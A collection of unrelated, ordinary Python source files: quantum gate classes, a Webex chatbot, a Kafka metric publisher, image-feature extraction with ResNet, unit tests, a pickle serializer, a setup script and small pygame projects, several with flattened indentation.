distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# -----------------------------------------------------
# @Time : 12/4/2018 4:04 PM
# @Author : Firmin.Sun ([email protected])
# @Software: ZJ_AI
# -----------------------------------------------------
# -*- coding: utf-8 -*-
from functools import reduce
def compose(*funcs):
"""Compose arbitrarily many functions, evaluated left to right.
Reference: https://mathieularose.com/function-composition-in-python/
"""
# return lambda x: reduce(lambda v, f: f(v), funcs, x)
if funcs:
return reduce(lambda f, g: lambda *a, **kw: g(f(*a, **kw)), funcs)
else:
raise ValueError('Composition of empty sequence not supported.') |
#
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
UsageStr = """
Single Task Regression and Performance Execute Utility
-h, --help - when present, displays this message
-x, --process-max - The max number of concurrent processes
-l,--msg-lev= - Set the output level, implemented as a bit mask example
if you want warnings and debug pass 20, 4 + 16
"nomsg" [0x0000]- supresses all message
"crit" [0x0001]- Critical Errors Messages
"err" [0x0002]- Non Critical Errors Messages
"warn" [0x0004]- Include Warning Messages
"info" [0x0008]- Run Info Messages
"dbg" [0x0010]- Debug Information
"user" [0x0020]- Special Messages
"trace" [0x0040]- provides call stack trace info
"noinfo" [0x0080]- supresses the info label
Example: "err"+"warn"+"dbg" will post messages
[ERROR] - Shows Non Critical Error Messages and
[WARN] - shows warning messages and
[DEBUG] - Shows debug messages and nothing else
Default: "crit+err+warn+info+noinfo"
To use the default log level and add levels prepend that level with a (+)
To use the default log level and remove levels prepend that level with a (-)
Example:
[-l +trace-crit+user]
will create an output level err+warn+info+noinfo+trace+user
"""
class Defaults(object):
msg_level = "crit+err+warn+info+noinfo"
process_max = 16
help = False
class CmdLine(object):
# Allowed Command Line Switches
Switches = ["help", "process-max=", "msg-lev="] # 0 # 1 # 2
    # Help can be triggered with a single letter
ShortOpts = "hx:l:"
# command Switch Index
help_index = 0
process_max_index = 1
msg_lev_index = 2
# Short Opts
Help = "-h"
MsgLevel = "-l"
ProcessMax = "-x"
|
# Copyright 2019 UniversalQCompiler (https://github.com/Q-Compiler/UniversalQCompiler)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from numpy import sin,cos
from functools import reduce
from copy import copy
def single_qubitify(mat, channel, n):
""" given a unitary 2x2 matrix and the channel to apply it on
returns the associated 2**n x 2**n matrix"""
assert mat.shape == (2,2)
return reduce(np.kron, [
np.identity(2**(n-channel-1)),
mat,
np.identity(2**channel)
])
def change_channel_order(mat, frm,to):
"""returns the matrix corresponding to mat when the tensored basis is reordered: frm <-> to"""
def swap_bits(n,i,j):
"""swaps i-th and j-th bit in n"""
bits_are_different = int((n >> i) % 2 != (n >> j) % 2)
return n ^ ((bits_are_different << i) | (bits_are_different << j))
n,m = mat.shape
return np.array(
[[mat[swap_bits(i,frm,to), swap_bits(j,frm,to)] for j in range(m)] for i in range(n)]
)
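# Illustrative sketch (not part of the original module): embedding a 2x2 gate
# into a two-qubit register and reordering the tensor-product channels.
if __name__ == '__main__':
    X = np.array([[0, 1], [1, 0]])
    # X acting on channel 0 of two qubits is I (x) X in this ordering ...
    print(np.array_equal(single_qubitify(X, 0, 2), np.kron(np.identity(2), X)))
    # ... and swapping channels 0 and 1 turns it into X (x) I.
    print(np.array_equal(change_channel_order(single_qubitify(X, 0, 2), 0, 1),
                         np.kron(X, np.identity(2))))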
class Gate:
def compute(self, vec):
raise NotImplementedError("compute() for "+type(self)+' not defined')
def get_matrix(self, dim):
raise TypeError("Matrix of "+type(self)+' not defined')
def inverse(self):
raise TypeError('Inverse of '+type(self)+' not defined')
class SimpleGate(Gate):
# uses the representation defined in the concrete gates
def __repr__(self, fmt=''):
cpy = copy(self)
for attr in [k for k,v in self.parameters.items() if v is float]:
if type(getattr(cpy, attr)) is not float:
# parametrised template
continue
setattr(cpy, attr, round(getattr(cpy,attr), self.str_digit_rounding))
return self.representation.replace('{', '{0.').format(cpy)
def __init__(self, channel_offset=0, **kwargs):
self.str_digit_rounding = 2
for k,v in kwargs.items():
try:
# handle synonyms
if hasattr(self, 'synonyms') and k in self.synonyms:
k = self.synonyms[k]
# this is for one-off channel count in Mathematica
if self.parameters[k] is int:
setattr(self, k, self.parameters[k](v) - channel_offset)
else:
setattr(self, k, self.parameters[k](v))
except KeyError:
raise TypeError("'" + k + "' is an invalid keyword argument for this function")
def compute(self, vec):
n = int(np.log2(len(vec)))
return np.dot(self.get_matrix(n), vec)
@property
def channels(self):
try:
return [self.channel]
except AttributeError:
return [self.channel1, self.channel2]
def max_channel(self):
return max(self.channels)
# always keep the angle between 0 and 2pi
@property
def angle(self):
return self.__angle
@angle.setter
def angle(self, angle):
try:
self.__angle = angle % (2 * np.pi)
except TypeError:
# parametrised angles
self.__angle = angle
class ComposedGate(Gate, list):
def compute(self, vec):
for g in reversed(self):
vec = g.compute(vec)
return vec
def get_matrix(self, dim):
ret = np.identity(2**dim)
for g in self:
ret = np.dot(ret, g.get_matrix(dim))
return ret
def inverse(self):
return list(map(lambda gate: gate.inverse(), reversed(self)))
def copy(self):
return ComposedGate(super(ComposedGate, self).copy())
def of_qubit(self, qubit):
"""
iterator only through gates concerning qubit `qubit`
"""
for g in self:
if isinstance(g, OneQubitGate):
if g.channel == qubit:
yield g
elif isinstance(g, TwoQubitGate):
if g.channel1 == qubit or g.channel2 == qubit:
yield g
else:
raise NotImplementedError
def max_channel(self):
return max(map(SimpleGate.max_channel, self))
class OneQubitGate(SimpleGate):
def get_matrix(self, dim=1):
if dim == 1:
return self.__matrix__()
else:
return single_qubitify(self.__matrix__(), self.channel, dim)
class TwoQubitGate(SimpleGate):
def get_matrix(self, dim=2):
"""applies kronecker product to gate matrix for the n-spin situation"""
if dim == 2:
ret = self.__matrix__()
else:
ret = np.kron(np.identity(2**(dim-2)), self.__matrix__())
# you need to be careful not to swap order twice
if self.channel1 == 1 and self.channel2 == 0:
ret = change_channel_order(ret, 0, 1)
elif self.channel1 == 1:
ret = change_channel_order(ret, 1, self.channel2)
ret = change_channel_order(ret, 0, self.channel1)
elif self.channel2 == 0:
ret = change_channel_order(ret, 0, self.channel1)
ret = change_channel_order(ret, 1, self.channel2)
elif self.channel1 == 0 and self.channel2 == 1:
pass
else:
ret = change_channel_order(ret, 0, self.channel1)
ret = change_channel_order(ret, 1, self.channel2)
return ret
class Rx(OneQubitGate):
representation = 'Rx({channel})({angle})'
parameters = {'channel': int, 'angle': float}
def inverse(self):
return Rx(channel=self.channel, angle=-self.angle)
def __matrix__(self):
return np.array(
[[cos(self.angle/2), -1j*sin(self.angle/2)],
[-1j*sin(self.angle/2), cos(self.angle/2)]])
class Ry(OneQubitGate):
representation = 'Ry({channel})({angle})'
parameters = {'channel':int, 'angle':float}
def inverse(self):
return Ry(channel=self.channel, angle=-self.angle)
def __matrix__(self):
return np.array(
[[cos(self.angle/2), -sin(self.angle/2)],
[sin(self.angle/2), cos(self.angle/2)]])
class Rz(OneQubitGate):
representation = 'Rz({channel})({angle})'
parameters = {'channel':int, 'angle':float}
def inverse(self):
return Rz(channel=self.channel, angle=-self.angle)
def __matrix__(self):
return np.array(
[[np.exp(-1j*self.angle/2), 0],
[0, np.exp(1j*self.angle/2)]])
class R(OneQubitGate):
representation = 'R({channel})({theta},{phi})'
parameters = {'channel':int, 'theta':float, 'phi':float}
def __matrix__(self):
return np.array(
[[np.cos(self.theta/2), -1j * np.exp(-1j*self.phi)*np.sin(self.theta/2)],
[-1j*np.exp(1j*self.phi)*np.sin(self.theta/2), np.cos(self.theta/2)]])
class CNot(TwoQubitGate):
representation = 'C({channel2})({channel1})'
parameters = {'channel1':int, 'channel2':int}
synonyms = {'control': 'channel2', 'target': 'channel1'}
def inverse(self):
return CNot(channel1=self.channel1, channel2=self.channel2)
def __matrix__(self):
return np.array(
[[1,0,0,0],
[0,1,0,0],
[0,0,0,1],
[0,0,1,0]])
class Swap(TwoQubitGate):
"""
This gate swaps the two qubits.
    This is useful for some template identities. All instances of Swap are removed during CNot_simplify.
"""
representation = 'S({channel1})({channel2})'
parameters = {'channel1': int, 'channel2':int}
def inverse(self):
return Swap(channel1=self.channel1, channel2=self.channel2)
def __matrix__(self):
return np.array(
[[1,0,0,0],
[0,0,1,0],
[0,1,0,0],
[0,0,0,1]])
class XX(TwoQubitGate):
representation = 'XX({channel1})({channel2})({angle})'
parameters = {'channel1': int, 'channel2': int, 'angle': float}
def __matrix__(self):
return np.array(
[[cos(self.angle), 0, 0, -1j*sin(self.angle)],
[0, cos(self.angle), -1j*sin(self.angle), 0],
[0, -1j*sin(self.angle), cos(self.angle), 0],
[-1j*sin(self.angle), 0, 0, cos(self.angle)]])
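# --- Illustrative sanity check (editor's addition, not part of the original file) ---
# A minimal sketch showing how the helpers above compose: it embeds a
# single-qubit Rx into a 2-qubit space, builds the CNot matrix, and checks
# unitarity / self-inverseness. Constructor arguments follow the `parameters`
# dicts defined above.
if __name__ == "__main__":
    rx = Rx(channel=0, angle=np.pi / 3)
    u = rx.get_matrix(2)  # 4x4 unitary acting on qubit 0 of a 2-qubit register
    assert np.allclose(u @ u.conj().T, np.identity(4))

    cnot = CNot(channel1=0, channel2=1)  # target on channel 0, control on channel 1
    c = cnot.get_matrix(2)
    assert np.allclose(c @ c, np.identity(4))  # CNOT is its own inverse

    composed = ComposedGate([cnot, cnot.inverse()])
    assert np.allclose(composed.get_matrix(2), np.identity(4))
    print("basic gate sanity checks passed")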
|
import json
from chalice import Chalice
from chalicelib import webexteams
app = Chalice(app_name='whois_bot')
bot_email = '[email protected]'
@app.route('/')
def hello():
return "Hi, this is working"
@app.route('/browsertest/{tech}')
def browser(tech):
name = webexteams.lookup(tech)
return "{name} is responsible for {tech}".format(name=name, tech=tech)
@app.route('/test', methods=['POST'])
def index():
# Get the POST data sent from Webex Teams
json_data = app.current_request.json_body
# Get the room details
roomId = json_data['data']['roomId']
# Get the message details
messageId = json_data['data']['id']
# make sure it isn't yourself, dumb bot!
if json_data['data']['personEmail'] != bot_email:
if 'cisco.com' in json_data['data']['personEmail']:
webexteams.ask(roomId, messageId)
else:
webexteams.sorry(roomId)
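# --- Editor's note (not part of the original file) ---
# The /test handler only reads a few fields of the Webex Teams webhook payload;
# a request body of roughly this shape (values are placeholders) exercises it:
#
# {
#   "data": {
#     "id": "<messageId>",
#     "roomId": "<roomId>",
#     "personEmail": "<someone>@cisco.com"
#   }
# }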
|
import pygame, sys, config
import sprites
import audio
from screens.menu_settings import menu_settingsScreen
from screens.game_screen import gameScreen
from screens.menu_screen import menuScreen
from screens.choose_map_screen import chooseMapScreen
#Initialize pygame
pygame.init()
#load sprites
sprites.init()
#load audio
audio.init()
config.menu_settingsScreen = menu_settingsScreen()
config.gameScreen = gameScreen()
config.menuScreen = menuScreen()
config.chooseMapScreen = chooseMapScreen()
#frames per second
fpsClock = pygame.time.Clock()
#Display the screen
config.screen = pygame.display.set_mode(config.SCREEN_SIZE)
#Name on the window
pygame.display.set_caption('Supernatural')
#Icon
icon = pygame.image.load('content/sprites/icon.jpg')
pygame.display.set_icon(icon)
#Current screen being displayed
config.current_screen = menuScreen()
#Game loop, makes the screen on all the time unless running = false
while not config.quit_game:
config.events = pygame.event.get()
for event in config.events:
#Quit
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
config.screen.fill((0, 0, 0))
config.current_screen.update(fpsClock.get_time())
config.current_screen.draw(config.screen)
pygame.display.update()
if config.sound_song_on == False:
pygame.mixer.music.pause()
fpsClock.tick(60) # set the FPS to 60
#Name on the window with FPS
    pygame.display.set_caption(f'Supernatural - fps: {fpsClock.get_fps()}')
|
#!/usr/bin/env python
import unittest
from day17 import open_doors, bfs
class TestFindsOpenDoorsFromHashAndPath(unittest.TestCase):
cases = (
('hijkl', '', ['U', 'D', 'L']),
('hijkl', 'D', ['U', 'L', 'R']),
('hijkl', 'DU', ['R']),
('hijkl', 'DUR', []),
)
def test_finds_open_doors(self):
for seed, path, expected in self.cases:
self.assertEqual(open_doors(seed, path), expected)
class TestFindsShortestPath(unittest.TestCase):
cases = (
('ihgpwlah', 'DDRRRD'),
('kglvqrro', 'DDUDRLRRUDRD'),
('ulqzkmiv', 'DRURDRUDDLLDLUURRDULRLDUUDDDRR'),
)
def test_finds_shortest_path(self):
for seed, expected in self.cases:
start = (0, 0)
goal = (3, 3)
paths = bfs(seed, start, goal)
self.assertEqual(paths[0], expected)
class TestFindsLongestPath(unittest.TestCase):
cases = (
('ihgpwlah', 370),
('kglvqrro', 492),
('ulqzkmiv', 830),
)
    def test_finds_longest_path(self):
for seed, expected in self.cases:
start = (0, 0)
goal = (3, 3)
paths = bfs(seed, start, goal)
self.assertEqual(len(paths[-1]), expected)
if __name__ == '__main__':
unittest.main()
|
from kafka import KafkaProducer
from kafka.errors import KafkaError
from kafka.future import log
import json
import random
import time
import re
import csv
def publish(producer, topic_name, metric_value, timestamp, unit, device_id, context):
value = {'records': [{ 'value': { 'metric_value':(metric_value), 'timestamp':(timestamp), 'unit':(unit), 'device_id':(device_id), 'context':(context) }}]}
print("Publishing in Kafka: %s", value)
futures = producer.send(topic=topic_name, value=value)
response = futures.get()
print(response)
print("Process data from Day-2 Configuration files and save them in variables")
# Remember this file path is known in advance due to the information model proposed
day2_file_path = "/usr/bin/expb_metricId-day2-config.yml"
f = open(day2_file_path, "r")
broker_ip_address = f.readline().split(":")[1].strip() + ":9092" # not used if Filebeat is provided
topic_name = f.readline().split(":")[1].strip() # not used if Filebeat is provided
device_id = f.readline().split(":")[1].strip()
unit = f.readline().split(":")[1].strip()
interval = f.readline().split(":")[1].strip()
interval_value = int(re.compile('([0-9]+)([a-zA-Z]+)').match(interval).group(1)) # Each $interval_value time, metric will be captured
interval_unit = re.compile('([0-9]+)([a-zA-Z]+)').match(interval).group(2)
context = f.readline().split(":")[1].strip().replace("|", " ") # change "|" for " "
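# For reference (editor's note): the parser above only relies on the line order
# and on the text after the first ':', so the Day-2 file is assumed to look
# roughly like this (key names are illustrative):
#
#   broker_ip: 192.0.2.10
#   topic: expb_metricId
#   device_id: sensor-01
#   unit: ms
#   interval: 5s
#   context: lab|bench|run1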
# Transform the interval_value consequently
if interval_unit == "s":
    interval_value = interval_value / 1
elif interval_unit == "ms":
    interval_value = interval_value / 1000
# In this example, metrics are generated randomly
print("Start capturing metrics")
producer = KafkaProducer(bootstrap_servers = broker_ip_address, value_serializer=lambda x: json.dumps(x).encode('utf-8'))
n_iter=10 # for avoiding an infinite loop
for i in range(n_iter):
print("Metric value ", i+1)
metric_value = random.uniform(-2,2)
timestamp = time.time()
publish(producer, topic_name, metric_value, timestamp, unit, device_id, context)
time.sleep(interval_value)
print("Script finished")
|
import unittest
from conans import tools
from conans.client.configure_build_environment import VisualStudioBuildEnvironment
from conans.test.utils.conanfile import MockConanfile, MockSettings
class BuildEnvironmentHelpers(unittest.TestCase):
def test_visual(self):
settings = MockSettings({})
conanfile = MockConanfile(settings)
conanfile.deps_cpp_info.include_paths.append("/one/include/path")
conanfile.deps_cpp_info.include_paths.append("/two/include/path")
conanfile.deps_cpp_info.lib_paths.append("/one/lib/path")
conanfile.deps_cpp_info.lib_paths.append("/two/lib/path")
tool = VisualStudioBuildEnvironment(conanfile)
self.assertEquals(tool.vars_dict, {
"CL": ["/I/one/include/path", "/I/two/include/path"],
"LIB": ["/one/lib/path", "/two/lib/path"],
})
# Now alter the paths before the vars_dict call
tool.include_paths.append("/three/include/path")
tool.lib_paths.append("/three/lib/path")
self.assertEquals(tool.vars_dict, {
"CL": ["/I/one/include/path", "/I/two/include/path", "/I/three/include/path"],
"LIB": ["/one/lib/path", "/two/lib/path", "/three/lib/path"],
})
# Now try appending to environment
with tools.environment_append({"CL": "/I/four/include/path /I/five/include/path",
"LIB": "/four/lib/path;/five/lib/path"}):
self.assertEquals(tool.vars_dict, {
"CL": ["/I/one/include/path", "/I/two/include/path",
"/I/three/include/path", "/I/four/include/path /I/five/include/path"],
"LIB": ["/one/lib/path", "/two/lib/path", "/three/lib/path", "/four/lib/path;/five/lib/path"],
})
self.assertEquals(tool.vars, {
"CL": '/I"/one/include/path" /I"/two/include/path" '
'/I"/three/include/path" /I/four/include/path /I/five/include/path',
"LIB": "/one/lib/path;/two/lib/path;/three/lib/path;/four/lib/path;/five/lib/path",
})
|
import math
import os
from collections import defaultdict
import PIL
from PIL import Image
from tqdm import tqdm
import torch
from torch import nn, utils
from torchvision import models, datasets, transforms
from utils import *
from .vision import VisionDataset
image_types = ['full_image', 'person_full']
image_size = [224, 224]
delimiter = '/'
def dict_for_each_episode():
return [dict() for i in range(18 + 1)] # episode index: from 1 to 18
def get_model(args):
print('Loading extractor model: using resnet18')
model = models.resnet18(pretrained=True)
extractor = nn.Sequential(*list(model.children())[:-2])
extractor.to(args.device)
return extractor
def preprocess_images(args):
print('Loading visual')
visuals = load_visual(args)
image_path = args.image_path
cache_dir = image_path / 'cache'
if not cache_dir.is_dir():
cache_dir.mkdir()
cached = {}
not_cached = {}
ext = '.pickle'
for key in image_types:
cache_path = cache_dir / (key + ext)
if cache_path.is_file():
cached[key] = cache_path
else:
not_cached[key] = cache_path
features = {key: dict_for_each_episode() for key in image_types}
for key, path in cached.items():
print("Loading %s feature cache" % key)
features[key] = load_pickle(path)
if not_cached: # not_cached not empty: some image types are not cached
not_cached_types = ', '.join(not_cached)
print('%s feature cache missing' % not_cached_types)
print('Loading image files and extracting %s features' % not_cached_types)
transform = transforms.Compose([
transforms.Resize(image_size),
transforms.ToTensor(),
# mean, std
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
model = get_model(args)
episode_paths = list(image_path.glob('*'))
for e in tqdm(episode_paths, desc='Episode'):
shot_paths = list(e.glob('*/*')) # episode/scene/shot
# Load image and flatten
images = load_images(shot_paths)
images = {"{}{}{}".format(vid, delimiter, name): image for vid, shots in images.items() for name, image in shots.items()}
dataset = ObjectDataset(args, images, visuals, not_cached, transform=transform)
chunk = extract_features(args, dataset, model)
for key in image_types:
for episode_total, episode_part in zip(features[key], chunk[key]):
episode_total.update(episode_part)
del images, dataset # delete data to retrieve memory
del model # delete extractor model to retrieve memory
if args.cache_image_vectors:
for key, path in not_cached.items():
print("Saving %s feature cache as %s" % (key, path))
save_pickle(features[key], path)
return features, visuals
def load_images(shot_paths):
"""
images = {
shot1: {
frame_id1: PIL image1,
...
},
...
}
"""
images = list(tqdm(map(load_image, shot_paths), total=len(shot_paths), desc='loading images'))
images = {k: v for k, v in images}
return images
def load_image(shot_path):
"""
res = {
frame_id1: PIL image1,
...
}
"""
image_paths = shot_path.glob('*')
vid = '_'.join(shot_path.parts[-3:])
res = {}
image_paths = sorted(list(image_paths))
for image_path in image_paths:
name = image_path.parts[-1] # name ex) IMAGE_0000046147.jpg
image = Image.open(image_path)
res[name] = image
return (vid, res)
def load_visual(args):
visual = load_json(args.visual_path)
visual_by_episode = dict_for_each_episode()
for shot, frames in visual.items():
episode = get_episode_id(shot)
episode_dict = visual_by_episode[episode]
for frame in frames:
frame_id = get_frame_id(frame['frame_id'])
episode_dict[frame_id] = frame
return visual_by_episode
class ObjectDataset(VisionDataset):
def __init__(self, args, images, visuals, not_cached, **kwargs):
super(ObjectDataset, self).__init__('~/', **kwargs)
self.args = args
self.images = list([(k, v) for k, v in images.items()])
self.visuals = visuals
self.not_cached = not_cached
def __len__(self):
return len(self.images)
def __getitem__(self, idx):
key, pil_full_image = self.images[idx]
episode = get_episode_id(key)
frame = get_frame_id(key)
visual = self.visuals[episode].get(frame, None)
data = {'key': (episode, frame)}
if self.transform is not None:
full_image = self.transform(pil_full_image)
if 'full_image' in self.not_cached:
data['full_image'] = full_image
if 'person_full' in self.not_cached:
data['person_full'] = self.get_person_full(pil_full_image, visual, full_image) # use full image for padding
return data
def collate_fn(self, batch):
collected = defaultdict(list)
for data in batch:
for key, value in data.items():
collected[key].append(value)
if 'full_image' in self.not_cached:
collected['full_image'] = torch.stack(collected['full_image'])
return collected
def get_person_full(self, pil_full_image, visual, padding):
person_fulls = []
if visual is not None:
persons = visual["persons"]
for p in persons:
full_rect = p["person_info"]["full_rect"]
if full_rect["max_x"] != '':
person_full = transforms.functional.crop(pil_full_image, *self.bbox_transform(full_rect))
if self.transform is not None:
person_full = self.transform(person_full)
else: # no bounding box
person_full = padding
person_fulls.append(person_full)
if not person_fulls: # empty (no visual data or no person)
person_fulls.append(padding)
person_fulls = torch.stack(person_fulls)
return person_fulls
def bbox_transform(self, rect):
"""min_x, min_y, max_x, max_y -> top left corner coordinates, height, width"""
top_left_v = rect["min_y"]
top_left_h = rect["min_x"]
height = rect["max_y"] - top_left_v
width = rect["max_x"] - top_left_h
return top_left_v, top_left_h, height, width
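# For illustration (editor's note): bbox_transform({"min_x": 10, "min_y": 20,
# "max_x": 110, "max_y": 220}) returns (20, 10, 200, 100), which matches the
# (top, left, height, width) argument order of transforms.functional.crop.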
def mean_pool(tensor, dim):
return torch.mean(tensor, dim=dim, keepdim=False)
def extract_and_pool(tensor, model, device):
tensor = tensor.to(device)
tensor = model(tensor) # N x C x H x W (N: extractor_batch_size / number of person fulls in a frame, C: 512)
tensor = mean_pool(tensor, -1) # N x C x H
tensor = mean_pool(tensor, -1) # N x C
tensor = tensor.cpu().numpy()
return tensor
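# Shape note (editor's addition): with the resnet18 trunk from get_model and
# 224x224 inputs, the extractor output is (N, 512, 7, 7); the two mean_pool
# calls reduce it to (N, 512, 7) and then (N, 512), one 512-d vector per image.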
def extract_features(args, dataset, model):
"""
full_images_by_episode = [
{}, # empty dict
{ (episode1)
frame_id: vector, # shape: (C,)
...
},
...
{ (episode18)
frame_id: vector,
...
}
]
person_fulls_by_episode = [
{}, # empty dict
{ (episode1)
frame_id: matrix, # shape: (N, C) N: number of person
...
},
...
{ (episode18)
frame_id: matrix,
...
}
]
"""
device = args.device
not_cached = dataset.not_cached
dataloader = utils.data.DataLoader(
dataset,
batch_size=args.extractor_batch_size,
shuffle=False,
num_workers=args.num_workers,
collate_fn=dataset.collate_fn
)
model.eval()
features = {key: dict_for_each_episode() for key in image_types}
with torch.no_grad():
for data in tqdm(dataloader, desc='extracting features'):
keys = data['key']
if 'full_image' in not_cached:
full_images = extract_and_pool(data['full_image'], model, device)
                for (e, f), fi in zip(keys, full_images):
features['full_image'][e][f] = fi
if 'person_full' in not_cached:
person_fulls = [extract_and_pool(pfu, model, device) for pfu in data['person_full']]
for (e, f), pfu in zip(keys, person_fulls):
features['person_full'][e][f] = pfu
del dataloader
return features
|
"""Serialization strategy based on the Pickle protocol."""
from typing import Any, BinaryIO
from dagger.serializer.errors import DeserializationError, SerializationError
class AsPickle:
"""
Serializer implementation that uses Pickle to marshal/unmarshal Python data structures.
Reference: https://docs.python.org/3/library/pickle.html
"""
extension = "pickle"
def serialize(self, value: Any, writer: BinaryIO):
"""Serialize a value using the Pickle protocol."""
import pickle
try:
pickle.dump(value, writer)
except (pickle.PicklingError, AttributeError) as e:
raise SerializationError(e)
def deserialize(self, reader: BinaryIO) -> Any:
"""Deserialize a pickled object into the value it represents."""
import pickle
try:
return pickle.load(reader)
except (
pickle.UnpicklingError,
AttributeError,
EOFError,
ImportError,
IndexError,
TypeError,
) as e:
raise DeserializationError(e)
def __repr__(self) -> str:
"""Get a human-readable string representation of the serializer."""
return "AsPickle()"
def __eq__(self, obj) -> bool:
"""Return true if both serializers are equivalent."""
return isinstance(obj, AsPickle)
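# --- Usage sketch (editor's addition, not part of the original module) ---
# Round-trips a small Python object through AsPickle using an in-memory
# buffer, just to show how the BinaryIO-based interface is meant to be used.
if __name__ == "__main__":
    import io

    serializer = AsPickle()
    buffer = io.BytesIO()
    serializer.serialize({"answer": 42, "values": [1, 2, 3]}, buffer)

    buffer.seek(0)
    assert serializer.deserialize(buffer) == {"answer": 42, "values": [1, 2, 3]}
    print(serializer, "round-trip OK")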
|
def bubble_sort(array):
n = len(array)
for j in range(n - 1, 0, -1):
swapped = False
for i in range(j):
if array[i] > array[i + 1]:
swap(array, i, i + 1)
swapped = True
if not swapped:
break
def swap(array, i, j):
array[i], array[j] = array[j], array[i]
a = [5, 15, 10, 30, 3, 1, 8, 4]
bubble_sort(a)
print(a)
|
from setuptools import setup  # setuptools (rather than distutils) is needed for install_requires
with open('README.rst') as f:
long_description = f.read()
setup(
name='dispatchonvalue',
version='0.9.9',
author='Ian Macinnes',
author_email='[email protected]',
packages=['dispatchonvalue', 'dispatchonvalue.test'],
url='https://github.com/minimind/dispatch-on-value-for-python',
license='MIT',
description='Provides the ability to dispatch on values using pattern '
'matching on complex, nested data structures containing '
'lists, dictionaries and primitive types',
long_description=long_description,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
keywords=['dispatch on value', 'multiple dispatch', 'dynamic dispatch',
'pattern matching', 'value patterns', 'patterns'],
include_package_data=True,
requires=['six'],
install_requires=['six >= 1.10.0'],
)
|
"""
Module defining a Falcon resource to provide login session info
Copyright (C) 2016 ERT Inc.
"""
import falcon
import api.json as json
from api.auth import auth
route = "user"
class User():
"""
Falcon resource object providing API login session info
"""
def on_get(self, request, resp):
"""
return JSON object, representing the current session's user info
"""
user_id = auth.get_user_id(request)
# return JSON user representation
user = get_user(user_id)
json_user = json.dumps(user)
resp.body = json_user
def get_user(user_id=None):
"""
Return object representing the logged in user
Keyword Parameters:
user_id -- String, identifier representing the logged in user
(Default: None, representing an public/anonymous user session)
>>> # Check public/Anonymous user
>>> from pprint import pprint
>>> anonymous_user = get_user()
>>> pprint(anonymous_user)
{'user': {'description': 'Anonymous user.', 'id': None}}
>>> anonymous_user = get_user(None) #public/Anonymous user
>>> pprint(anonymous_user)
{'user': {'description': 'Anonymous user.', 'id': None}}
>>> # Check logged in user
>>> user = get_user('uid=bob.newhart,ou=People,o=bobnewhart.com')
>>> pprint(user)
{'user': {'description': 'Authenticated user.',
'id': 'uid=bob.newhart,ou=People,o=bobnewhart.com'}}
"""
description = "Authenticated user."
if user_id is None:
description = "Anonymous user."
attributes = {'id': user_id, 'description': description}
user_object = {'user': attributes}
return user_object
|
import util3d
import gentrack
import gentrackdata
import random
import MAIN
import pygame
enemyNumber = 20
happyNumber = 80
treeNumber = 50
class Terrain:
def __init__(self):
self.enemies = []
self.happy = []
self.trees =[]
self.lap_count = 0
gentrack.run()
self.pixelData = gentrackdata.getPixelData()
self.img = util3d.makeTexture("track.png")[0]
self.nodes = gentrack.storedResults
for x in range(happyNumber):
pos = (0,0)
while self.pixelData[pos[0]][pos[1]] != 1:
pos = (random.randint(0,1023),random.randint(0,1023))
self.happy.append(util3d.Sprite3d("windows.png",pos[0]/512-1,0,pos[1]/512-1,0.01))
for x in range(enemyNumber):
pos = (0,0)
while self.pixelData[pos[0]][pos[1]] != 1:
pos = (random.randint(0,1023),random.randint(0,1023))
self.enemies.append(util3d.Sprite3d("apple.png",pos[0]/512-1,0,pos[1]/512-1,0.01))
for x in range(treeNumber):
pos = (random.randint(0,1023),random.randint(0,1023))
while self.pixelData[pos[0]][pos[1]] != 0:
pos = (random.randint(0,1023),random.randint(0,1023))
self.trees.append(util3d.Sprite3d("tree.png",pos[0]/512-1,0,pos[1]/512-1,0.1))
#print(len(self.pixelData))
self.next_node = self.nodes[1]
self.this_node = self.nodes[0]
self.next_i = 1
def check_nodes(self,pos,r):
if (self.next_node[1]-pos[1])**2 + (self.next_node[0]-pos[0])**2 < 0.3:
self.next_i+=1
if self.next_i == len(self.nodes):
print("Lap count + 1")
self.lap_count+=1
MAIN.score += 3
if self.lap_count == 3:
return True
self.next_i %= len(self.nodes)
self.this_node = self.next_node
self.next_node = self.nodes[self.next_i]
print("Node Advanced to",self.next_i)
return False
|